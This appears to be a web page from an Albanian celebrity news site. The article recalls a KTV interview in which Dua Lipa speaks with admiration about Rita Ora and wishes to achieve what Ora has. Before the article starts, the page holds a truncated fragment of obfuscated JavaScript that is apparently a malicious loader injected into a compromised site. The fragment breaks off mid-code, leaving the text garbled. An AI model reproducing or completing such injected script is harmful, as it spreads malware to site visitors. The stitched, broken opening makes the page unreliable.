;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kur Dua Lipa fliste me pasion për Rita Orën: Ku me marr me u bo si Rita!

By

Të gjithë shqiptarët i shqetëson fakti që Dua Lipa e Rita Ora nuk flasin mes vete! Është diskutuar aq shumë raporti i dy shqiptareve të famshme në botë, sa po t’i shohim bashkë në ndonjë event, do ishte çështja kryesore në opinonin publik.

Ndonëse as njëra e as tjetra nuk kanë treguar pse s’kanë një raport më të afërt, Prive sjellë në retrospektivë një intervistë të Dua Lipës kohë më parë, të dhënë për televizionin KTV, ku ajo flet për Rita Orën.

“Ku me marr me u bo si ajo, me bo atë çka ka bo Rita kish me qenë tepër mirë”, thotë Dua, në zhargonin urban të Prishtinës, me një shqipe shumë simpatike.

Lipa shihet qartë që flet me shumë pasion për Ritën dhe pa djallëzi, megjithatë se çfarë ka ndodhur me dy shqiptaret që jetojnë në Britani të Madhe nuk është bërë kurrë e qartë. /Prive.al

 

Artikuj të ngjashëm